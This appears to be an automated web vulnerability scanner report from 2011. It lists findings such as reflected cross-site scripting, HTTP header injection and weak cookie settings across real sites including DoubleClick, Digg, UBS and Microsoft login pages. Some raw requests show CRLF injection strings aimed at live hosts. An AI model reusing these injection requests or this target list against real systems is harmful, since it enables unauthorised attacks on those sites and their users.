1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]
1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]
2. Cross-site scripting (reflected)
2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]
2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]
2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]
2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]
2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]
2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]
2.7. http://adonmax.com/afr.php [campaignid parameter]
2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]
2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]
2.10. http://api.mixpanel.com/track/ [callback parameter]
2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]
2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]
2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]
2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]
2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]
2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]
2.19. http://digg.com/login [REST URL parameter 1]
2.20. http://digg.com/register [REST URL parameter 1]
2.21. http://digg.com/search [REST URL parameter 1]
2.22. http://digg.com/submit [REST URL parameter 1]
2.23. http://digg.com/topic [REST URL parameter 1]
2.24. http://digg.com/upcoming [REST URL parameter 1]
2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]
2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]
2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]
2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]
2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]
2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]
2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]
2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]
2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]
2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]
2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]
2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]
2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]
2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]
2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]
2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]
2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]
2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]
2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]
2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]
2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]
2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]
2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]
2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]
2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]
2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]
2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]
2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]
2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]
2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]
2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]
2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]
2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]
2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]
2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]
2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]
2.61. http://jqueryui.com/themeroller/ [fcActive parameter]
2.62. http://jqueryui.com/themeroller/ [fcContent parameter]
2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]
2.64. http://jqueryui.com/themeroller/ [fcError parameter]
2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]
2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]
2.67. http://jqueryui.com/themeroller/ [fcHover parameter]
2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]
2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]
2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]
2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]
2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]
2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]
2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]
2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]
2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]
2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]
2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]
2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]
2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]
2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]
2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]
2.84. http://js.revsci.net/gateway/gw.js [csid parameter]
2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]
2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]
2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]
2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]
2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]
2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]
2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]
3.1. http://ad.doubleclick.net/crossdomain.xml
3.2. http://adx.adnxs.com/crossdomain.xml
3.3. http://bp.specificclick.net/crossdomain.xml
3.4. http://core.insightexpressai.com/crossdomain.xml
3.5. http://ecn.dev.virtualearth.net/crossdomain.xml
3.6. http://idcs.interclick.com/crossdomain.xml
3.7. http://rs.gwallet.com/crossdomain.xml
3.8. http://bstats.adbrite.com/crossdomain.xml
3.9. http://cdn.stumble-upon.com/crossdomain.xml
3.10. http://feeds.bbci.co.uk/crossdomain.xml
3.11. http://googleads.g.doubleclick.net/crossdomain.xml
3.12. http://newsrss.bbc.co.uk/crossdomain.xml
3.13. http://api.twitter.com/crossdomain.xml
4. Silverlight cross-domain policy
4.1. http://ad.doubleclick.net/clientaccesspolicy.xml
4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml
4.3. http://profile.live.com/clientaccesspolicy.xml
5. Cleartext submission of password
5.10. http://manage.softlayer.mobi/
6. SSL cookie without secure flag set
6.1. https://accountservices.passport.net/gethip.srf
6.2. https://ebanking.ubs.com/en/
6.3. https://live.zune.net/xweb/passport/bottomCB.aspx
6.4. https://live.zune.net/xweb/passport/rightCB.aspx
6.5. https://live.zune.net/xweb/passport/topCB.aspx
6.6. https://login.live.com/login.srf
6.7. https://login.live.com/pp1100/
6.8. https://login.live.com/ppsecure/post.srf
6.9. https://login.live.com/ppsecure/secure.srf
6.10. https://login.live.com/resetpw.srf
6.11. https://msnia.login.live.com/ppsecure/post.srf
6.12. https://quotes-public.ubs.com/
7.1. https://manage.softlayer.com/
7.2. https://manage.softlayer.com/Sales/orderComputingInstance
7.3. https://manage.softlayer.com/index/index
8. Password field submitted using GET method
9. Cookie scoped to parent domain
9.1. https://accountservices.passport.net/gethip.srf
9.2. http://api.twitter.com/1/statuses/user_timeline.json
9.3. http://c.microsoft.com/trans_pixel.aspx
9.4. http://ads.revsci.net/adserver/ako
9.5. http://ads.revsci.net/adserver/ako
9.6. http://adx.adnxs.com/mapuid
9.7. http://b.scorecardresearch.com/b
9.8. http://b.scorecardresearch.com/p
9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs
9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs
9.11. http://bstats.adbrite.com/adserver/behavioral-data/0
9.12. http://cang.baidu.com/do/add
9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/
9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
9.15. https://ebanking.ubs.com/en/
9.17. http://idcs.interclick.com/Segment.aspx
9.18. http://js.revsci.net/gateway/gw.js
9.19. http://leadback.advertising.com/adcedge/lb
9.20. https://live.zune.net/xweb/passport/bottomCB.aspx
9.21. https://live.zune.net/xweb/passport/rightCB.aspx
9.22. https://live.zune.net/xweb/passport/topCB.aspx
9.23. http://m.adnxs.com/msftcookiehandler
9.24. https://msnia.login.live.com/ppsecure/post.srf
9.25. http://p.brilig.com/contact/bct
9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif
9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302
9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js
9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js
9.30. http://pixel.quantserve.com/pixel
9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif
9.32. http://profile.live.com/badge/
9.33. https://quotes-public.ubs.com/
9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de
9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en
9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr
9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it
9.39. http://r.turn.com/r/beacon
9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999
9.41. http://rs.gwallet.com/r1/pixel/x1094
9.42. http://rs.gwallet.com/r1/pixel/x1225
9.43. http://rs.gwallet.com/r1/pixel/x368
9.44. http://rs.gwallet.com/r1/pixel/x369
10. Cookie without HttpOnly flag set
10.2. http://about.digg.com/ads
10.3. http://about.digg.com/blog
10.4. http://about.digg.com/contact
10.5. http://about.digg.com/faq
10.6. http://about.digg.com/partnership
10.7. http://about.digg.com/privacy
10.8. http://about.digg.com/terms-use
10.9. https://accountservices.passport.net/gethip.srf
10.10. http://c.microsoft.com/trans_pixel.aspx
10.11. http://developers.digg.com/
10.13. http://knowledgelayer.softlayer.com/
10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm
10.15. https://nae.ubs.com/quotes
10.16. https://nae.ubs.com/quotes/markets_instruments
10.18. http://ad.yieldmanager.com/pixel
10.19. http://adonmax.com/afr.php
10.20. http://ads.revsci.net/adserver/ako
10.21. http://ads.revsci.net/adserver/ako
10.22. http://b.scorecardresearch.com/b
10.23. http://b.scorecardresearch.com/p
10.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs
10.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs
10.26. http://bstats.adbrite.com/adserver/behavioral-data/0
10.27. http://cang.baidu.com/do/add
10.28. http://clk.atdmt.com/MRT/go/285207471/direct/01/
10.29. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
10.30. http://delicious.com/save
10.32. http://digg.com/upcoming
10.33. http://friendfeed.com/share
10.34. http://idcs.interclick.com/Segment.aspx
10.35. http://js.revsci.net/gateway/gw.js
10.36. http://leadback.advertising.com/adcedge/lb
10.37. https://live.zune.net/xweb/passport/bottomCB.aspx
10.38. https://live.zune.net/xweb/passport/rightCB.aspx
10.39. https://live.zune.net/xweb/passport/topCB.aspx
10.40. https://login.live.com/login.srf
10.41. https://login.live.com/pp1100/
10.42. https://login.live.com/ppsecure/post.srf
10.43. https://login.live.com/ppsecure/secure.srf
10.44. https://login.live.com/resetpw.srf
10.45. http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif
10.46. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif
10.47. http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif
10.48. http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif
10.49. https://msnia.login.live.com/ppsecure/post.srf
10.50. http://p.brilig.com/contact/bct
10.51. http://pinpoint.microsoft.com/en-US/Default.aspx
10.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif
10.53. http://pix04.revsci.net/G10937/a4/0/0/0.302
10.54. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js
10.55. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js
10.56. http://pixel.quantserve.com/pixel
10.57. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif
10.58. http://profile.live.com/badge/
10.59. http://promote.orkut.com/preview
10.60. https://quotes-public.ubs.com/
10.61. https://quotes-public1.ubs.com/app/CGT/Workbench/
10.62. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home
10.63. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de
10.64. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en
10.65. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr
10.66. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it
10.67. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi
10.68. http://r.turn.com/r/beacon
10.69. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999
10.70. http://rs.gwallet.com/r1/pixel/x1094
10.71. http://rs.gwallet.com/r1/pixel/x1225
10.72. http://rs.gwallet.com/r1/pixel/x368
10.73. http://rs.gwallet.com/r1/pixel/x369
11. Password field with autocomplete enabled
11.1. https://clientlogin.ibb.ubs.com/login
11.5. http://digg.com/register
11.6. http://digg.com/register
11.12. http://digg.com/upcoming
11.13. https://foton-ewm-es.ubs.com/safe-login/Login
11.14. https://fundgate.ubs.com/GIS/Default.aspx
11.15. https://manage.softlayer.com/
11.16. https://manage.softlayer.com/Sales/orderComputingInstance
11.17. https://manage.softlayer.com/index/index
11.18. http://manage.softlayer.mobi/
11.19. https://onlineservices.ubs.com/olsauth/ex/pbl/lo
11.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp
11.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu
11.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu
11.23. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
11.24. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu
11.25. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu
11.26. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl
13. Referer-dependent response
14.1. https://accountservices.passport.net/uiresetpw.srf
14.2. https://blog.metricstream.com/
14.3. https://login.live.com/resetpw.srf
14.4. https://login.live.com/resetpw.srf
15. Cross-domain Referer leakage
15.1. https://accountservices.passport.net/gethip.srf
15.2. https://accountservices.passport.net/uiresetpw.srf
15.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122
15.4. http://ad.doubleclick.net/adj/bzj.techflash/
15.5. http://ad.doubleclick.net/adj/bzj.techflash/
15.6. http://ad.doubleclick.net/adj/bzj.techflash/home_page
15.7. http://ad.doubleclick.net/adj/bzj.techflash/home_page
15.8. http://adonmax.com/afr.php
15.9. http://bcp.crwdcntrl.net/px
15.10. http://bp.specificclick.net/
15.11. http://cm.g.doubleclick.net/pixel
15.12. http://cm.g.doubleclick.net/pixel
15.14. http://go.microsoft.com/fwlink/
15.15. http://googleads.g.doubleclick.net/pagead/ads
15.16. http://jqueryui.com/themeroller/
15.17. http://live.zune.net/signin.ashx
15.18. http://live.zune.net/signin.ashx
15.19. http://live.zune.net/signin.ashx
15.20. https://login.live.com/login.srf
15.21. https://login.live.com/ppsecure/post.srf
15.22. http://p.brilig.com/contact/bct
15.23. http://pinpoint.microsoft.com/en-US/Default.aspx
15.24. http://promote.orkut.com/preview
15.25. http://pubads.g.doubleclick.net/gampad/ads
15.26. http://pubads.g.doubleclick.net/gampad/ads
15.27. http://pubads.g.doubleclick.net/gampad/ads
15.28. http://s.bebo.com/c/site/index20_script.js
15.29. http://s.bebo.com/js/mediaboxAdv-1.3.4b.js
16. Cross-domain script include
16.2. http://about.digg.com/ads
16.3. http://about.digg.com/blog
16.4. http://about.digg.com/contact
16.5. http://about.digg.com/faq
16.6. http://about.digg.com/partnership
16.7. http://about.digg.com/privacy
16.8. http://about.digg.com/terms-use
16.9. http://ad.doubleclick.net/adi/N3285.google/B2343920.122
16.10. http://analytics.microsoft.com/Sync.html
16.11. http://analytics.msn.com/Include.html
16.12. http://bcp.crwdcntrl.net/px
16.13. https://blog.metricstream.com/
16.14. http://blog.softlayer.com/
16.18. http://developers.digg.com/
16.21. http://digg.com/register
16.25. http://digg.com/upcoming
16.26. http://docs.jquery.com/Tutorials:Introducing_$(document
16.27. http://docs.jquery.com/UI
16.28. http://docs.jquery.com/UI/Accordion
16.29. http://docs.jquery.com/UI/Effects/
16.30. http://docs.jquery.com/UI/Effects/Slide
16.31. http://googleads.g.doubleclick.net/pagead/ads
16.34. http://jquery.malsup.com/cycle/
16.35. http://jqueryui.com/about
16.36. http://jqueryui.com/themeroller/
16.37. http://malsup.com/jquery/cycle/
16.38. http://medienfreunde.com/lab/innerfade/
16.39. http://pubads.g.doubleclick.net/gampad/ads
16.40. http://pubads.g.doubleclick.net/gampad/ads
17.1. http://bp.specificclick.net/
17.2. http://cdn1.diggstatic.com/
17.3. http://crl.globalsign.net/
18.1. http://about.digg.com/privacy
18.2. http://about.digg.com/terms-use
18.4. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js
18.5. http://bstats.adbrite.com/adserver/behavioral-data/0
18.6. http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js
18.7. https://foton-ewm-es.ubs.com/safe-login/Login
18.8. http://jqueryui.com/about
18.9. https://login.live.com/login.srf
18.10. https://login.live.com/pp1100/
18.11. https://login.live.com/ppsecure/post.srf
18.12. https://login.live.com/ppsecure/secure.srf
18.13. https://manage.softlayer.com/
18.14. https://manage.softlayer.com/Sales/orderComputingInstance
18.15. https://manage.softlayer.com/index/index
18.16. https://msnia.login.live.com/ppsecure/post.srf
18.17. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna
18.18. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp
18.19. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp
18.20. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp
18.21. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp
18.22. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp
18.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp
18.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp
18.25. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html
18.26. http://s.bebo.com/js/mootools-core-and-more-1.3.js
19. Private IP addresses disclosed
19.2. http://digg.com/ajax/submit/crawl
19.4. http://digg.com/register
19.11. http://digg.com/upcoming
20. Credit card numbers disclosed
21.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122
21.2. http://api.twitter.com/receiver.html
21.3. http://cdn.stumble-upon.com/css/global_su.css
21.4. http://crl.globalsign.net/Root.crl
21.6. http://feeds.bbci.co.uk/news/rss.xml
21.7. http://googleads.g.doubleclick.net/pagead/ads
21.8. https://login.live.com/login.srf
21.9. https://manage.softlayer.com/Sales/orderComputingInstance
21.10. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
21.11. http://profile.live.com/badge/
22.1. https://blog.metricstream.com/
22.2. https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html
22.3. https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html
22.4. https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html
22.5. https://live.zune.net/xweb/passport/leftCB.aspx
22.6. https://login.live.com/pp1100/RDHelper_JS.srf
22.7. https://manage.softlayer.com/
22.8. https://manage.softlayer.com/Sales/orderComputingInstance
22.9. https://manage.softlayer.com/favicon.ico
22.10. https://manage.softlayer.com/index/index
22.11. https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch
22.12. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch
22.13. https://nae.ubs.com/favicon.ico
22.14. https://onesource.ubs.com/
22.15. https://onlineservices.ubs.com/
22.16. https://onlineservices.ubs.com/favicon.ico
22.17. https://onlineservices.ubs.com/olsauth/ex/pbl/lo
22.18. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp
22.19. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu
22.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl
22.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu
22.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl
22.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp
22.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp
22.25. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp
22.26. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp
22.27. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp
22.28. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp
22.29. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp
22.30. https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf
22.31. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html
22.32. https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf
23. HTML does not specify charset
23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122
23.2. http://analytics.microsoft.com/Sync.html
23.3. http://analytics.msn.com/Include.html
23.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs
23.5. https://fundgate.ubs.com/GIS/Default.aspx
23.6. http://jqueryui.com/about
23.7. http://jqueryui.com/themeroller/
23.8. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm
23.9. https://nae.ubs.com/quotes
23.10. https://nae.ubs.com/quotes/markets_instruments
23.11. https://onesource.ubs.com/
23.12. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html
23.13. http://p.brilig.com/contact/bct
23.14. http://pixel.invitemedia.com/data_sync
24. HTML uses unrecognised charset
24.1. http://adonmax.com/afr.php
24.2. http://cang.baidu.com/do/add
25. Content type incorrectly stated
25.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif
25.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif
25.3. https://accountservices.passport.net/gethip.srf
25.4. http://api.mixpanel.com/track/
25.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs
25.7. https://login.live.com/pp1100/RDHelper_JS.srf
25.8. https://manage.softlayer.com/favicon.ico
25.9. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg
25.10. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg
25.11. https://nae.ubs.com/favicon.ico
25.12. http://s.bebo.com/js/mootools-core-and-more-1.3.js
26. Content type is not specified
26.1. https://ebanking-us.ubs.com/safeloginu/Login
26.2. https://foton-ewm-de.ubs.com/safe-login/Login
26.3. https://foton-ewm-es.ubs.com/safe-login/Login
26.4. https://login.live.com/hiphelp.srf
27.1. https://clientlogin.ibb.ubs.com/
27.3. https://manage.softlayer.com/
27.4. https://onlineservices.ubs.com/
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/bzj.techflash/home |
GET /49448%0d%0a875587022d3/bzj.techflash/home_page Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://techflash.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/49448 875587022d3/bzj.techflash/home_page Date: Wed, 06 Jul 2011 14:01:08 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /9fae7%0d%0ae1ef4895d68/N3285.google/B2343920 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9fae7 e1ef4895d68/N3285.google/B2343920 Date: Wed, 06 Jul 2011 11:56:12 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /adi/N3285.google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4883 Cache-Control: no-cache Pragma: no-cache Date: Wed, 06 Jul 2011 11:56:12 GMT Expires: Wed, 06 Jul 2011 11:56:12 GMT <html><head><title ...[SNIP]... hzcy1yZWZsZWN0ZWQtY3 var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 7 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /adi/N3285.google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4903 Date: Wed, 06 Jul 2011 11:55:42 GMT <html><head><title ...[SNIP]... BCdoBbGZpbGU6Ly8vRDo var wmode = "op ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
GET /adi/N3285.google Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3 |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4903 Date: Wed, 06 Jul 2011 11:56:11 GMT <html><head><title ...[SNIP]... hc2VkLXhzcy1yZWZsZWN var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "fal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3285.google |
